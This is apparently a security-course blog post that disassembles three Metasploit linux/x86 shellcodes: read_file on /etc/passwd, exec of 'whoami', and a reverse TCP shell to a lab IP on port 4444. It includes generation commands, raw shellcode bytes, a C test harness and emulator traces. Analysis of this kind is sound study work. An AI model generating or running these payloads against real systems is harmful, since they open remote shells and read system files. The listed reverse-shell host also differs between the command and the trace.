Assignment
- Take up at least 3 shellcode samples created using Msfpayload for linux/x86
- Use GDB/Ndisasm/Libemu to dissect the functionality of the shellcode
- Present your analysis
Shellcode – linux/x86/read_file (Ndisasm)
Starting simple we chose the read_file payload from msfvenom. A quick look at the options shows us the file descriptor is set to 1 by default which is STDOUT so we only need to supply the path variable to generate our shellcode.
suls@kali:~/slae/Assignment-5$ msfvenom -p linux/x86/read_file --list-options Options for payload/linux/x86/read_file: ========================= Name: Linux Read File Module: payload/linux/x86/read_file Platform: Linux Arch: x86 Needs Admin: No Total size: 62 Rank: Normal Provided by: hal Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- FD 1 yes The file descriptor to write output to PATH yes The file path to read Description: Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor
We generate our shellcode with the command seen below.
msfvenom -p linux/x86/read_file PATH=/etc/passwd -f raw -o read_file_shellcode
Then disassemble the shellcode using Ndisasm
cat read_file_shellcode | ndisasm -u -
In line analysis of the shellcode is provided below however at a high level the following syscalls are made in order to open, read and write the file to STDOUT.
- open(“/etc/passwd”, 0)
- read(int fd, void *buf, 4096)
- write(int fd, const void *buf, size_t count);
- exit(0)
00000000 EB36 jmp short 0x38 # Jump to 00000038 which calls 0x2 (JMP-CALL-POP technique) # Stores the address of the file path starting at 0000003D 00000002 B805000000 mov eax,0x5 # Syscall 5 = Open 00000007 5B pop ebx # Pop filepath to EBX (0000003D) 00000008 31C9 xor ecx,ecx # Zero ecx 0000000A CD80 int 0x80 # Syscall open(const char *pathname, int flags); 0000000C 89C3 mov ebx,eax # Move file describer returned to edb by previous syscall descriptor to ebx 0000000E B803000000 mov eax,0x3 # Store 3 in eax = read syscall 00000013 89E7 mov edi,esp 00000015 89F9 mov ecx,edi # Point ECX to the top of the stack = Location to save read bytes 00000017 BA00100000 mov edx,0x1000 # Store 4096 as the number of bytes to read 0000001C CD80 int 0x80 # Syscall = read(int fd, void *buf, size_t count); 0000001E 89C2 mov edx,eax # Store number of bytes read in edx 00000020 B804000000 mov eax,0x4 # Set eax to 4 = syscall write 00000025 BB01000000 mov ebx,0x1 # Set ebx to 1 = File describer STDOUT 0000002A CD80 int 0x80 # Sycall = write(int fd, const void *buf, size_t count); 0000002C B801000000 mov eax,0x1 # Syscall 1 = Exit 00000031 BB00000000 mov ebx,0x0 # Return code 0 00000036 CD80 int 0x80 # Syscall 1 = Clean exit 00000038 E8C5FFFFFF call 0x2 # Call 0x2, call part of JMP-CALL-POP sequence 0000003D 2F 3 # Remaining code is the file path /etc/passwd 0000003E 657463 gs jz 0xa4 00000041 2F das 00000042 7061 jo 0xa5 00000044 7373 jnc 0xb9 00000046 7764 ja 0xac 00000048 00 db 0x00
Shellcode – linux/x86/exec (GDB)
For our second shellcode we are reviewing the metasploit linux/x86/exec generated shellcode with GDB. Firstly we generate our shellcode with msfvenon:
msfvenom -p linux/x86/exec -f c CMD=whoami [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 42 bytes Final size of c file: 201 bytes unsigned char buf[] = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68" "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x07\x00\x00\x00\x77" "\x68\x6f\x61\x6d\x69\x00\x57\x53\x89\xe1\xcd\x80";
We paste this into our shellcode.c program in order to compile and execute the code:
#include<stdio.h> #include<string.h> unsigned char code[] = \ "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68" "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x07\x00\x00\x00\x77" "\x68\x6f\x61\x6d\x69\x00\x57\x53\x89\xe1\xcd\x80"; int main() { int (*ret)() = (int(*)())code; ret(); }
We then compile and test:
Next we run via GDB and break and disassemble the code:
./gdb shellcode_GDB break *&code set disassemably-flavor intel run Breakpoint 1, 0x0804a040 in code () (gdb) disassemble Dump of assembler code for function code: => 0x0804a040 <+0>: push 0xb 0x0804a042 <+2>: pop eax 0x0804a043 <+3>: cdq 0x0804a044 <+4>: push edx 0x0804a045 <+5>: pushw 0x632d 0x0804a049 <+9>: mov edi,esp 0x0804a04b <+11>: push 0x68732f 0x0804a050 <+16>: push 0x6e69622f 0x0804a055 <+21>: mov ebx,esp 0x0804a057 <+23>: push edx 0x0804a058 <+24>: call 0x804a064 <code+36> 0x0804a05d <+29>: ja 0x804a0c7 0x0804a05f <+31>: outs dx,DWORD PTR ds:[esi] 0x0804a060 <+32>: popa 0x0804a061 <+33>: ins DWORD PTR es:[edi],dx 0x0804a062 <+34>: imul eax,DWORD PTR [eax],0xe1895357 0x0804a068 <+40>: int 0x80 0x0804a06a <+42>: add BYTE PTR [eax],al End of assembler dump.
Of interest is the syscall at 0x0804a068, so we set a break point here with:
break *0x0804a068 continue
Reviewing the registers we find the following:
(gdb) info registers eax 0xb 11 ecx 0xbfffee2e -1073746386 edx 0x0 0 ebx 0xbfffee3e -1073746370 esp 0xbfffee2e 0xbfffee2e ebp 0xbfffee68 0xbfffee68 esi 0xb7fba000 -1208246272 edi 0xbfffee46 -1073746362 eip 0x804a068 0x804a068 <code+40> eflags 0x286 [ PF SF IF ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51
This indicates that the execve syscall is being made due to eax being 11. Review of the man page for execve details the parameters passed.
![](https://www.suls.co.uk/wp-content/uploads/2021/06/image-2-1024x491.png)
Examining the memory at 0xbfffee3e (EBX) we can see the first argument is /bin/sh:
(gdb) x/1s 0xbfffee3e 0xbfffee3e: "/bin/sh"
I was struggling to work out the string array at ECX via GDB alone so installed the PEDA extension to make things a little clearer. Using PEDA we can see the array of arguments passed to to the syscall are on the stack at 0xbfffee2e “/bin/sh”, ‘-c’ and “whoami” respectively:
![](https://www.suls.co.uk/wp-content/uploads/2021/06/image-3.png)
Finally EDX is 0x0 for the ENVP variable, which conculdes our analysis, the resulting command being:
execve("/bin/sh",["/bin/sh",'-c',"whoami"],0)
Shellcode – linux/x86/shell_reverse_tcp (libemu)
For our final shellcode we are analysing the metasploit linux/x86/shell_reverse_tcp shellcode with libemu, We generate the shellcode to a raw file with the following command:
linux/x86/shell_reverse_tcp RPORT=4444 RHOST=192.168.1.1 -o shell-reverse-tcp
We use the following guide to install libemu within our Ubuntu VM, https://www.doyler.net/security-not-included/libemu-installation and proceed to analyse the shellcode with the following command:
cat shell-reverse-tcp | sctest -vvv -Ss 100000 verbose=3
This provides us with the following breakdown of the code:
[emu 0x0x85b7480 debug ] cpu state eip=0x00417000 [emu 0x0x85b7480 debug ] eax=0x00000000 ecx=0x00000000 edx=0x00000000 ebx=0x00000000 [emu 0x0x85b7480 debug ] esp=0x00416fce ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: [emu 0x0x85b7480 debug ] cpu state eip=0x00417000 [emu 0x0x85b7480 debug ] eax=0x00000000 ecx=0x00000000 edx=0x00000000 ebx=0x00000000 [emu 0x0x85b7480 debug ] esp=0x00416fce ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: [emu 0x0x85b7480 debug ] 31DB xor ebx,ebx [emu 0x0x85b7480 debug ] cpu state eip=0x00417002 [emu 0x0x85b7480 debug ] eax=0x00000000 ecx=0x00000000 edx=0x00000000 ebx=0x00000000 [emu 0x0x85b7480 debug ] esp=0x00416fce ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF ZF [emu 0x0x85b7480 debug ] F7E3 mul ebx [emu 0x0x85b7480 debug ] cpu state eip=0x00417004 [emu 0x0x85b7480 debug ] eax=0x00000000 ecx=0x00000000 edx=0x00000000 ebx=0x00000000 [emu 0x0x85b7480 debug ] esp=0x00416fce ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF ZF [emu 0x0x85b7480 debug ] 53 push ebx [emu 0x0x85b7480 debug ] cpu state eip=0x00417005 [emu 0x0x85b7480 debug ] eax=0x00000000 ecx=0x00000000 edx=0x00000000 ebx=0x00000000 [emu 0x0x85b7480 debug ] esp=0x00416fca ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF ZF [emu 0x0x85b7480 debug ] 43 inc ebx [emu 0x0x85b7480 debug ] cpu state eip=0x00417006 [emu 0x0x85b7480 debug ] eax=0x00000000 ecx=0x00000000 edx=0x00000000 ebx=0x00000001 [emu 0x0x85b7480 debug ] esp=0x00416fca ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: [emu 0x0x85b7480 debug ] 53 push ebx [emu 0x0x85b7480 debug ] cpu state eip=0x00417007 [emu 0x0x85b7480 debug ] eax=0x00000000 ecx=0x00000000 edx=0x00000000 ebx=0x00000001 [emu 0x0x85b7480 debug ] esp=0x00416fc6 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: [emu 0x0x85b7480 debug ] 6A02 push byte 0x2 [emu 0x0x85b7480 debug ] cpu state eip=0x00417009 [emu 0x0x85b7480 debug ] eax=0x00000000 ecx=0x00000000 edx=0x00000000 ebx=0x00000001 [emu 0x0x85b7480 debug ] esp=0x00416fc2 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: [emu 0x0x85b7480 debug ] 89E1 mov ecx,esp [emu 0x0x85b7480 debug ] cpu state eip=0x0041700b [emu 0x0x85b7480 debug ] eax=0x00000000 ecx=0x00416fc2 edx=0x00000000 ebx=0x00000001 [emu 0x0x85b7480 debug ] esp=0x00416fc2 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: [emu 0x0x85b7480 debug ] B066 mov al,0x66 [emu 0x0x85b7480 debug ] cpu state eip=0x0041700d [emu 0x0x85b7480 debug ] eax=0x00000066 ecx=0x00416fc2 edx=0x00000000 ebx=0x00000001 [emu 0x0x85b7480 debug ] esp=0x00416fc2 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: [emu 0x0x85b7480 debug ] CD80 int 0x80 int socket(int domain=2, int type=1, int protocol=0); [emu 0x0x85b7480 debug ] cpu state eip=0x0041700f [emu 0x0x85b7480 debug ] eax=0x0000000e ecx=0x00416fc2 edx=0x00000000 ebx=0x00000001 [emu 0x0x85b7480 debug ] esp=0x00416fc2 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: [emu 0x0x85b7480 debug ] 93 xchg eax,ebx [emu 0x0x85b7480 debug ] cpu state eip=0x00417010 [emu 0x0x85b7480 debug ] eax=0x00000001 ecx=0x00416fc2 edx=0x00000000 ebx=0x0000000e [emu 0x0x85b7480 debug ] esp=0x00416fc2 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: [emu 0x0x85b7480 debug ] 59 pop ecx [emu 0x0x85b7480 debug ] cpu state eip=0x00417011 [emu 0x0x85b7480 debug ] eax=0x00000001 ecx=0x00000002 edx=0x00000000 ebx=0x0000000e [emu 0x0x85b7480 debug ] esp=0x00416fc6 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: [emu 0x0x85b7480 debug ] B03F mov al,0x3f [emu 0x0x85b7480 debug ] cpu state eip=0x00417013 [emu 0x0x85b7480 debug ] eax=0x0000003f ecx=0x00000002 edx=0x00000000 ebx=0x0000000e [emu 0x0x85b7480 debug ] esp=0x00416fc6 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: [emu 0x0x85b7480 debug ] CD80 int 0x80 int dup2(int oldfd=14, int newfd=2); [emu 0x0x85b7480 debug ] cpu state eip=0x00417015 [emu 0x0x85b7480 debug ] eax=0x00000002 ecx=0x00000002 edx=0x00000000 ebx=0x0000000e [emu 0x0x85b7480 debug ] esp=0x00416fc6 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: [emu 0x0x85b7480 debug ] 49 dec ecx [emu 0x0x85b7480 debug ] cpu state eip=0x00417016 [emu 0x0x85b7480 debug ] eax=0x00000002 ecx=0x00000001 edx=0x00000000 ebx=0x0000000e [emu 0x0x85b7480 debug ] esp=0x00416fc6 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: [emu 0x0x85b7480 debug ] 79F9 jns 0xfffffffb [emu 0x0x85b7480 debug ] cpu state eip=0x00417011 [emu 0x0x85b7480 debug ] eax=0x00000002 ecx=0x00000001 edx=0x00000000 ebx=0x0000000e [emu 0x0x85b7480 debug ] esp=0x00416fc6 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: [emu 0x0x85b7480 debug ] B03F mov al,0x3f [emu 0x0x85b7480 debug ] cpu state eip=0x00417013 [emu 0x0x85b7480 debug ] eax=0x0000003f ecx=0x00000001 edx=0x00000000 ebx=0x0000000e [emu 0x0x85b7480 debug ] esp=0x00416fc6 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: [emu 0x0x85b7480 debug ] CD80 int 0x80 int dup2(int oldfd=14, int newfd=1); [emu 0x0x85b7480 debug ] cpu state eip=0x00417015 [emu 0x0x85b7480 debug ] eax=0x00000001 ecx=0x00000001 edx=0x00000000 ebx=0x0000000e [emu 0x0x85b7480 debug ] esp=0x00416fc6 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: [emu 0x0x85b7480 debug ] 49 dec ecx [emu 0x0x85b7480 debug ] cpu state eip=0x00417016 [emu 0x0x85b7480 debug ] eax=0x00000001 ecx=0x00000000 edx=0x00000000 ebx=0x0000000e [emu 0x0x85b7480 debug ] esp=0x00416fc6 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF ZF [emu 0x0x85b7480 debug ] 79F9 jns 0xfffffffb [emu 0x0x85b7480 debug ] cpu state eip=0x00417011 [emu 0x0x85b7480 debug ] eax=0x00000001 ecx=0x00000000 edx=0x00000000 ebx=0x0000000e [emu 0x0x85b7480 debug ] esp=0x00416fc6 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF ZF [emu 0x0x85b7480 debug ] B03F mov al,0x3f [emu 0x0x85b7480 debug ] cpu state eip=0x00417013 [emu 0x0x85b7480 debug ] eax=0x0000003f ecx=0x00000000 edx=0x00000000 ebx=0x0000000e [emu 0x0x85b7480 debug ] esp=0x00416fc6 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF ZF [emu 0x0x85b7480 debug ] CD80 int 0x80 int dup2(int oldfd=14, int newfd=0); [emu 0x0x85b7480 debug ] cpu state eip=0x00417015 [emu 0x0x85b7480 debug ] eax=0x00000000 ecx=0x00000000 edx=0x00000000 ebx=0x0000000e [emu 0x0x85b7480 debug ] esp=0x00416fc6 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF ZF [emu 0x0x85b7480 debug ] 49 dec ecx [emu 0x0x85b7480 debug ] cpu state eip=0x00417016 [emu 0x0x85b7480 debug ] eax=0x00000000 ecx=0xffffffff edx=0x00000000 ebx=0x0000000e [emu 0x0x85b7480 debug ] esp=0x00416fc6 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF SF [emu 0x0x85b7480 debug ] 79F9 jns 0xfffffffb [emu 0x0x85b7480 debug ] cpu state eip=0x00417018 [emu 0x0x85b7480 debug ] eax=0x00000000 ecx=0xffffffff edx=0x00000000 ebx=0x0000000e [emu 0x0x85b7480 debug ] esp=0x00416fc6 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF SF [emu 0x0x85b7480 debug ] 68C0A80185 push dword 0x8501a8c0 [emu 0x0x85b7480 debug ] cpu state eip=0x0041701d [emu 0x0x85b7480 debug ] eax=0x00000000 ecx=0xffffffff edx=0x00000000 ebx=0x0000000e [emu 0x0x85b7480 debug ] esp=0x00416fc2 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF SF [emu 0x0x85b7480 debug ] 680200115C push dword 0x5c110002 [emu 0x0x85b7480 debug ] cpu state eip=0x00417022 [emu 0x0x85b7480 debug ] eax=0x00000000 ecx=0xffffffff edx=0x00000000 ebx=0x0000000e [emu 0x0x85b7480 debug ] esp=0x00416fbe ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF SF [emu 0x0x85b7480 debug ] 89E1 mov ecx,esp [emu 0x0x85b7480 debug ] cpu state eip=0x00417024 [emu 0x0x85b7480 debug ] eax=0x00000000 ecx=0x00416fbe edx=0x00000000 ebx=0x0000000e [emu 0x0x85b7480 debug ] esp=0x00416fbe ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF SF [emu 0x0x85b7480 debug ] B066 mov al,0x66 [emu 0x0x85b7480 debug ] cpu state eip=0x00417026 [emu 0x0x85b7480 debug ] eax=0x00000066 ecx=0x00416fbe edx=0x00000000 ebx=0x0000000e [emu 0x0x85b7480 debug ] esp=0x00416fbe ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF SF [emu 0x0x85b7480 debug ] 50 push eax [emu 0x0x85b7480 debug ] cpu state eip=0x00417027 [emu 0x0x85b7480 debug ] eax=0x00000066 ecx=0x00416fbe edx=0x00000000 ebx=0x0000000e [emu 0x0x85b7480 debug ] esp=0x00416fba ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF SF [emu 0x0x85b7480 debug ] 51 push ecx [emu 0x0x85b7480 debug ] cpu state eip=0x00417028 [emu 0x0x85b7480 debug ] eax=0x00000066 ecx=0x00416fbe edx=0x00000000 ebx=0x0000000e [emu 0x0x85b7480 debug ] esp=0x00416fb6 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF SF [emu 0x0x85b7480 debug ] 53 push ebx [emu 0x0x85b7480 debug ] cpu state eip=0x00417029 [emu 0x0x85b7480 debug ] eax=0x00000066 ecx=0x00416fbe edx=0x00000000 ebx=0x0000000e [emu 0x0x85b7480 debug ] esp=0x00416fb2 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF SF [emu 0x0x85b7480 debug ] B303 mov bl,0x3 [emu 0x0x85b7480 debug ] cpu state eip=0x0041702b [emu 0x0x85b7480 debug ] eax=0x00000066 ecx=0x00416fbe edx=0x00000000 ebx=0x00000003 [emu 0x0x85b7480 debug ] esp=0x00416fb2 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF SF [emu 0x0x85b7480 debug ] 89E1 mov ecx,esp [emu 0x0x85b7480 debug ] cpu state eip=0x0041702d [emu 0x0x85b7480 debug ] eax=0x00000066 ecx=0x00416fb2 edx=0x00000000 ebx=0x00000003 [emu 0x0x85b7480 debug ] esp=0x00416fb2 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF SF [emu 0x0x85b7480 debug ] CD80 int 0x80 connect [emu 0x0x85b7480 debug ] cpu state eip=0x0041702f [emu 0x0x85b7480 debug ] eax=0x00000000 ecx=0x00416fb2 edx=0x00000000 ebx=0x00000003 [emu 0x0x85b7480 debug ] esp=0x00416fb2 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF SF [emu 0x0x85b7480 debug ] 52 push edx [emu 0x0x85b7480 debug ] cpu state eip=0x00417030 [emu 0x0x85b7480 debug ] eax=0x00000000 ecx=0x00416fb2 edx=0x00000000 ebx=0x00000003 [emu 0x0x85b7480 debug ] esp=0x00416fae ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF SF [emu 0x0x85b7480 debug ] 686E2F7368 push dword 0x68732f6e [emu 0x0x85b7480 debug ] cpu state eip=0x00417035 [emu 0x0x85b7480 debug ] eax=0x00000000 ecx=0x00416fb2 edx=0x00000000 ebx=0x00000003 [emu 0x0x85b7480 debug ] esp=0x00416faa ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF SF [emu 0x0x85b7480 debug ] 682F2F6269 push dword 0x69622f2f [emu 0x0x85b7480 debug ] cpu state eip=0x0041703a [emu 0x0x85b7480 debug ] eax=0x00000000 ecx=0x00416fb2 edx=0x00000000 ebx=0x00000003 [emu 0x0x85b7480 debug ] esp=0x00416fa6 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF SF [emu 0x0x85b7480 debug ] 89E3 mov ebx,esp [emu 0x0x85b7480 debug ] cpu state eip=0x0041703c [emu 0x0x85b7480 debug ] eax=0x00000000 ecx=0x00416fb2 edx=0x00000000 ebx=0x00416fa6 [emu 0x0x85b7480 debug ] esp=0x00416fa6 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF SF [emu 0x0x85b7480 debug ] 52 push edx [emu 0x0x85b7480 debug ] cpu state eip=0x0041703d [emu 0x0x85b7480 debug ] eax=0x00000000 ecx=0x00416fb2 edx=0x00000000 ebx=0x00416fa6 [emu 0x0x85b7480 debug ] esp=0x00416fa2 ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF SF [emu 0x0x85b7480 debug ] 53 push ebx [emu 0x0x85b7480 debug ] cpu state eip=0x0041703e [emu 0x0x85b7480 debug ] eax=0x00000000 ecx=0x00416fb2 edx=0x00000000 ebx=0x00416fa6 [emu 0x0x85b7480 debug ] esp=0x00416f9e ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF SF [emu 0x0x85b7480 debug ] 89E1 mov ecx,esp [emu 0x0x85b7480 debug ] cpu state eip=0x00417040 [emu 0x0x85b7480 debug ] eax=0x00000000 ecx=0x00416f9e edx=0x00000000 ebx=0x00416fa6 [emu 0x0x85b7480 debug ] esp=0x00416f9e ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF SF [emu 0x0x85b7480 debug ] B00B mov al,0xb [emu 0x0x85b7480 debug ] cpu state eip=0x00417042 [emu 0x0x85b7480 debug ] eax=0x0000000b ecx=0x00416f9e edx=0x00000000 ebx=0x00416fa6 [emu 0x0x85b7480 debug ] esp=0x00416f9e ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF SF [emu 0x0x85b7480 debug ] CD80 int 0x80 execve int execve (const char *dateiname=00416fa6={//bin/sh}, const char * argv[], const char *envp[]); [emu 0x0x85b7480 debug ] cpu state eip=0x00417044 [emu 0x0x85b7480 debug ] eax=0x0000000b ecx=0x00416f9e edx=0x00000000 ebx=0x00416fa6 [emu 0x0x85b7480 debug ] esp=0x00416f9e ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF SF [emu 0x0x85b7480 debug ] 0000 add [eax],al cpu error error accessing 0x00000004 not mapped stepcount 42 [emu 0x0x85b7480 debug ] cpu state eip=0x00417046 [emu 0x0x85b7480 debug ] eax=0x0000000b ecx=0x00416f9e edx=0x00000000 ebx=0x00416fa6 [emu 0x0x85b7480 debug ] esp=0x00416f9e ebp=0x00000000 esi=0x00000000 edi=0x00000000 [emu 0x0x85b7480 debug ] Flags: PF SF int socket ( int domain = 2; int type = 1; int protocol = 0; ) = 14; int dup2 ( int oldfd = 14; int newfd = 2; ) = 2; int dup2 ( int oldfd = 14; int newfd = 1; ) = 1; int dup2 ( int oldfd = 14; int newfd = 0; ) = 0; int connect ( int sockfd = 14; struct sockaddr_in * serv_addr = 0x00416fbe => struct = { short sin_family = 2; unsigned short sin_port = 23569 (port=4444); struct in_addr sin_addr = { unsigned long s_addr = -2063488832 (host=192.168.1.133); }; char sin_zero = " "; }; int addrlen = 102; ) = 0; int execve ( const char * dateiname = 0x00416fa6 => = "//bin/sh"; const char * argv[] = [ = 0x00416f9e => = 0x00416fa6 => = "//bin/sh"; = 0x00000000 => none; ]; const char * envp[] = 0x00000000 => none; ) = 0;
We also create a PNG graph of the shellcode as follows:
cat shell-reverse-tcp | sctest -vvv -Ss 100000 -G shell-reverse-tcp.dot dot shell-reverse-tcp.dot -Tpng -o shell-reverse-tcp.png
![](https://www.suls.co.uk/wp-content/uploads/2021/06/image-4-681x1024.png)
Unsurprisingly given our work on Assignment 2 the libemu break down and graph shows us the following actions taken:
- Create a socket
- Duplicate STDERR, STDOUT and STDIN to the created socket
- Connect to 192.168.1.1 Port 4444
- Execute /bin/sh via execve
This completes assignment five, source code is available on GitHub https://github.com/su1s/SLAE
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1436
[…] outputting it with the IV and Key. So we take the linux/x86/exec whoami shellcode we analysed in Assignment 5 with GDB and pass it to the crypter as seen […]